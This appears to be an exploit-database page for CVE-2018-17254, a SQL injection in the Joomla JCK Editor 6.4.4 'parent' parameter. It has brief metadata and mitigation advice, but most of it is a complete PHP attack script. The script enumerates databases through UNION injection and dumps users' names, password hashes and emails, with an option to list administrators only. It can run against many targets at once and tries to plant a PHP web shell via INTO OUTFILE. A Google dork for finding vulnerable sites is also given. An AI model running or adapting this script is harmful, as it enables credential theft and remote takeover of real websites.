header-logo
Suggest Exploit
vendor:
JCK Editor
by:
Nicholas Ferreira
9.8
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: JCK Editor
Affected Version From: 6.4.2004
Affected Version To: 6.4.2004
Patch Exists: YES
Related CWE: CVE-2018-17254
CPE: a:joomla:jck_editor:6.4.4
Metasploit:
Other Scripts:
Tags: cve,cve2018,packetstorm,edb,joomla,sqli
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Nuclei References: http://packetstormsecurity.com/files/161683/Joomla-JCK-Editor-6.4.4-SQL-Injection.htmlhttps://www.exploit-db.com/exploits/45423/
Nuclei Metadata: {'max-request': 1, 'framework': 'joomla\\!', 'vendor': 'arkextensions', 'product': 'jck_editor'}
Platforms Tested: Debian 10
2021

Joomla JCK Editor 6.4.4 – ‘parent’ SQL Injection (2)

The Joomla JCK Editor version 6.4.4 is vulnerable to SQL Injection. The vulnerability allows an attacker to inject malicious SQL statements into the 'parent' parameter in the 'links.php' file. By exploiting this vulnerability, an attacker can retrieve sensitive information from the database or modify the database contents.

Mitigation:

Update to the latest version of Joomla JCK Editor to fix the SQL Injection vulnerability. It is also recommended to sanitize user inputs and use prepared statements to prevent SQL Injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)
# Googke Dork: inurl:/plugins/editors/jckeditor/plugins/jtreelink/
# Date: 05/03/2021
# Exploit Author: Nicholas Ferreira
# Vendor Homepage: http://docs.arkextensions.com/downloads/jck-editor
# Version: 6.4.4
# Tested on: Debian 10
# CVE : CVE-2018-17254
# PHP version (exploit): 7.3.27
# POC: /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20aa

<?php

$vuln_file = '/editors/jckeditor/plugins/jtreelink/dialogs/links.php';

function payload($str1, $str2=""){
	return '?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,'.$str1.',NULL,NULL,NULL,NULL,NULL'.$str2.'--%20aa'; #"
}


function get_request($url){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
	#curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8080");
    $output = curl_exec($ch);
    curl_close($ch);
    return $output;
}

function parse_columns($columns){
	$parsed_columns = array();
	foreach($columns as $col){
		array_push($parsed_columns, $col);
		array_push($parsed_columns, "0x242324"); //delimiter = $#$
	}
	return $parsed_columns;
}

function inject($url, $payload){
	global $vuln_file;
	$request = get_request($url.$vuln_file.$payload);
	preg_match_all('/url ="(.*)">/', $request, $output);
	return $output;
}
######

function is_vulnerable($url){
	global $vuln_file;
	$output = inject($url, payload("0x6861636b6564"));
	if(isset($output[1][0])){
		if(base64_encode($output[1][0]) == "aGFja2Vk"){ //checking if we can inject
			return 1;
		}
	}
	return 0;
}

function get_db_names($url){
	global $vuln_file;
	$db_names = array();
	$output = inject($url, payload("schema_name", "%20from%20information_schema.schemata"));
	foreach($output[1] as $db){
		array_push($db_names, $db);
	}
	return $db_names;
}

function get_table_names($url, $db){
	global $vuln_file;
	$table_names = array();
	$output = inject($url, payload("table_name", "%20from%20information_schema.tables%20WHERE%20table_schema=%27".$db."%27"));
	foreach($output as $table){
		array_push($table_names, $table);
	}
	return $table_names;
}

function get_column_names($url, $table){
	global $vuln_file;
	$column_names = array();
	$output = inject($url, payload("column_name", "%20from%20information_schema.columns%20WHERE%20table_name=%27".$table."%27"));
	foreach($output as $column){
		array_push($column_names, $column);
	}
	return $column_names;
}

function dump_columns($url, $columns, $dbname, $table){
	global $vuln_file;
	$column_dump = array();
	$related_arr = array();
	$data = array();
	$output = inject($url, payload("concat(".implode(',', parse_columns($columns)).")", "%20from%20".$dbname.".".$table));
	foreach($output[1] as $column){
		$exploded = explode("$#$", $column);
		array_push($data, $exploded);
	}
	foreach($data as $user_info){
		array_pop($user_info);
		array_push($related_arr, array_combine($columns, $user_info));
	}
	return $related_arr;
}

function rce($url){	//probably won't work =(
	global $vuln_file;
	if(!is_vulnerable($url)){
		die(red("[-] Target isn't vulnerable."));
	}
	$server_root = array("/var/www/", "/var/www/html/", "/usr/local/apache2/htdocs/", "/var/www/nginx-default/", "/srv/www/", "/usr/local/apache2/htdocs/");
	$rand_content = "AklOGg8kJ7GfbIuBYfDS2apD4L2vADk8QgODUg2OmDNy2";
	$payl0ad = "'<?php system(\$_GET[0]); ?> ".$rand_content."'";
	$filename = rand(1000, 7359).".php";
	echo cyan("[i]")." Trying to upload a RCE shell...\n";
	foreach($server_root as $path){
		inject($url, payload($payl0ad, " INTO OUTFILE '".$path.$filename."'"));
	}
	$get_shell = get_request($url."/".$filename);
	if(strpos($get_shell, $rand_content) !== false){
		echo green("[+] RCE shell successfully uploaded! =)\n");
		die("Usage: ".$url."/".$filename."?0=whoami\n");
	}else{
		echo(red("[-] ")."Could not upload RCE shell. Maybe stacked queries are not supported. =(\n");
		die(cyan("[i] ")."But you can still inject SQL commands! What about dumping the users table? =)\n");
	}
}

function read_file($url, $file){
	global $vuln_file;
}

############

function green($str){
	return "\e[92m".$str."\e[0m";
}
function red($str){
	return "\e[91m".$str."\e[0m";
}
function yellow($str){
	return "\e[93m".$str."\e[0m";
}
function cyan($str){
	return "\e[96m".$str."\e[0m";
}

function banner(){
	echo "
   ___  _____  _   __ _____
  |_  |/  __ \| | / /|  _  \
    | || /  \/| |/ / | | | | _   _  _ __ ___   _ __    ___  _ _
    | || |    |    \ | | | || | | || '_ ` _ \ | '_ \  / _ \| '__|
/\__/ /| \__/\| |\  \| |/ / | |_| || | | | | || |_) ||  __/| |
\____/  \____/\_| \_/|___/   \__,_||_| |_| |_|| .__/  \___||_|
                     ".green("Coder: ").yellow("Nicholas Ferreira")." | |
                                              |_|

";
}
$target = 0;
$rce = 0;
function check(){
	global $argv;
	global $argc;
	global $target;
	global $rce;
	global $target_list;
	global $save_output;
	global $verbose;
	global $less;
	global $specified_db;
	$short_args = "u:t:v::h::l::r::d::";
	$long_args = array("url:","targets::","verbose::","help::","less::","rce::", "db::");
	$options = getopt($short_args, $long_args);

	if(isset($options['h']) || $argc == 1 || isset($options['help'])){
		echo "JCK Editor v6.4.4 SQL Injection exploit (CVE-2018-17254)

	Usage: php ".$argv[0]." -u url [-h] [-v] [-l] [-o] [-r command] [-f list_of_targets] [-d db]

	-u, --url: Path to Joomla! plugins (e.g. website.com/site/plugins/)
	-h, --help: Help
	-v, --verbose: Verbose mode (print tables)
	-l, --less: Less outputs (only Administrator usernames and passwords)
	-t, --targets: Load a list of targets
	-r, --rce: Try to upload a RCE shell
	-d, --db: Specifies the DB to dump

	";

		}

		if(isset($options['u'])){
			$target = $options['u'];
		}elseif(isset($options['url'])){
			$target = $options['url'];
		}else{
			$target = "";
		}

		isset($options['v']) || isset($options['verbose']) ? $verbose = 1 : $verbose = 0;
		isset($options['l']) || isset($options['less']) ? $less = 1 : $less = 0;
		isset($options['r']) || isset($options['rce']) ? $rce = 1 : $rce = 0;
		isset($options['f']) ? $target_list = $options['f'] : $target_list = 0;

		if(isset($options['t'])){
			$target_list = $options['t'];
		}elseif(isset($options['targets'])){
			$target_list = $options['targets'];
		}else{
			$target_list = 0;
		}

		if(isset($options['d'])){
			$specified_db = $options['d'];
		}elseif(isset($options['db'])){
			$specified_db = $options['db'];
		}else{
			$specified_db = 0;
		}


		if(strlen($target_list) < 2){
			if($target !== ""){ // check if URL is ok
				if(!preg_match('/^((https?:\/\/)|(www\.)|(.*))([a-z0-9-].?)+(:[0-9]+)?(\/.*)?$/', $target)){
					die(red("[i] The target must be a URL.\n"));
				}
				if(strpos($target, "plugins") == false){
					die(red("[-] You must provide the Joomla! plugins path! (standard: exemple.com/plugins/)\n"));
				}
			}else{
				die(cyan("[-] ")."You can get help with -h.\n");
			}
		}

		if($target_list !== 0){ //check if target list is readable
			if(!file_exists($target_list)){
				die(red("[-] ")."Could not read target list file.\n");
			}
		}
}



function exploit($url){ // returns users and passwords
	global $vuln_file;
	global $verbose;
	global $rce;
	global $specified_db;
	global $less;
	echo cyan("\n=========================| ".str_replace("plugins", "", $url)." |=========================\n\n\n");
	echo cyan("[+] ")."Checking if target is vulnerable...\n";
	if (is_vulnerable($url)){
		$main_db = inject($url, payload("database()"))[1];
		$user_table = "";
		$hostname = inject($url, payload("@@hostname"))[1];
		$mysql_user = inject($url, payload("user()"))[1];
		$mysql_version = inject($url, payload("@@version"))[1];
		$connection_id = inject($url, payload("connection_id()"))[1];

		echo green("[+] Target is vulnerable! =)\n\n");
		echo cyan("[i] ")."Hostname: ".yellow($hostname[0])."\n";
		echo cyan("[i] ")."Current database: ".yellow($main_db[0])."\n";
		echo cyan("[i] ")."MySQL version: ".yellow($mysql_version[0])."\n";
		echo cyan("[i] ")."MySQL user: ".yellow($mysql_user[0])."\n";
		echo cyan("[i] ")."Connection ID: ".yellow($connection_id[0])."\n\n";

		if($rce){
			rce($url);
		}


		echo cyan("[+] ")."Getting DB names...\n";
		$dbs = get_db_names($url);
		if(count($dbs) == 0){
			echo("[-] There are no DBs available on this target. =(\n");
		}

		$db_list = array();
		foreach($dbs as $db){
			$num_table = count(get_table_names($url, $db)[1]);
			echo green("[+] DB found: ").cyan($db." [".$num_table." tables]")."\n";
			array_push($db_list, $db);
		}
		if($main_db == "" && !$specified_db){
			echo(red("[-] Could not find Joomla! default DB. Try to dump another DB with -d. \n"));
		}
		if($specified_db !== 0){ // if user doesn't specify a custom db
			echo cyan("\n[+] ")."Getting tables from ".yellow($specified_db)."...\n";
			$tables = get_table_names($url, $specified_db);
		}else{
			foreach($db_list as $new_db){
				if($new_db !== "test" && strlen(strpos($new_db, "information_schema") !== false) == 0){ // neither test nor i_schema
					echo cyan("\n[+] ")."Getting tables from ".yellow($new_db)."...\n";
					$tables = get_table_names($url, $new_db);
				}
			}
		}
		echo cyan("[+] ").yellow(count($tables[1]))." tables found! \n";
		if(count($tables[1]) == 0){
			echo(red("[-] "."Site is vulnerable, but no tables were found on this DB. Try to dump another DB with -d. \n"));
		}

		foreach($tables[1] as $table){
			if($verbose) echo $table."\n";
			if(strpos($table, "_users") !== false){
				$user_table = $table;
			}
		}

		if($user_table == ""){
			echo(red("[-] Could not find Joomla default users table. Try to find it manually!\n"));
		}

		echo cyan("[+] ")."Getting columns from ".yellow($user_table)."...\n";
		$columns = get_column_names($url, $user_table);

		if(count($columns) == 0){
			echo(red("[-] There are no columns on this table... =(\n"));
		}
		if($verbose){
			echo cyan("[+] ")."Columns found:\n";
			foreach($columns[1] as $coll){
				echo $coll."\n";
			}
		}
		echo cyan("[+] ")."Dumping usernames from ".yellow($user_table)."...\n";

		$dump = dump_columns($url, array("id","usertype", "name","username","password","email","lastvisitDate"), $db, $user_table);

		if(is_array($dump) && count($dump) == 0){
			$new_dump = dump_columns($url, array("id","name","username","password","email","lastvisitDate"), $db, $user_table);
			if(count($new_dump) == 0){
				echo(red("[-] This table is empty! =(\n"));
			}else{
				$dump = $new_dump;
				$usertype = 0;
			}
		}else{
			$usertype = 1;
		}
		echo cyan("\n[+] ")."Retrieved data:\n";
		foreach($dump as $user){
		if($usertype){
			$adm = strpos($user['usertype'], 'Administrator') !== false;
		}else{
			$adm = false;
		}
		if($less){
			if(strpos($user['usertype'], "Administrator") !== false){
				echo "\n=============== ".green($user['username'])." ===============\n";
				foreach($user as $key => $data){
					if(strlen($data) > 0){
							if($key == "username" || $key == "password" || $adm){
								echo($key.": ".red($data)."\n");
							}else{
								echo($key.": ".$data."\n");
							}
					}
				}
			}

		}else{
			echo "\n=============== ".green($user['username'])." ===============\n";
			foreach($user as $key => $data){
				if(strlen($data) > 0){
						if($key == "username" || $key == "password" ||  $adm){
							echo($key.": ".red($data)."\n");
						}else{
							echo($key.": ".$data."\n");
						}
					}
				}
			}

		}

		echo(green("\nExploit completed! =)\n\n\n"));

	}else{
		echo(red("[-] Apparently, the provided target is not vulnerable. =(\n\n"));
		echo(cyan("[i] ")."This may be a connectivity issue. If you're persistent, you can try again.\n");
	}
}


banner();
check();

if(strlen($target_list) >1){
	$targets = explode(PHP_EOL, file_get_contents($target_list)); //split by newline
	foreach($targets as $website){
		if($rce){
			rce($target);
		}else{
			if(strlen($website) > 1){
				exploit($website); //multiple targets
			}
		}
	}
}else{
	exploit($target); //single target
}

?>

Navigation

Suggest Exploit

Services By CQR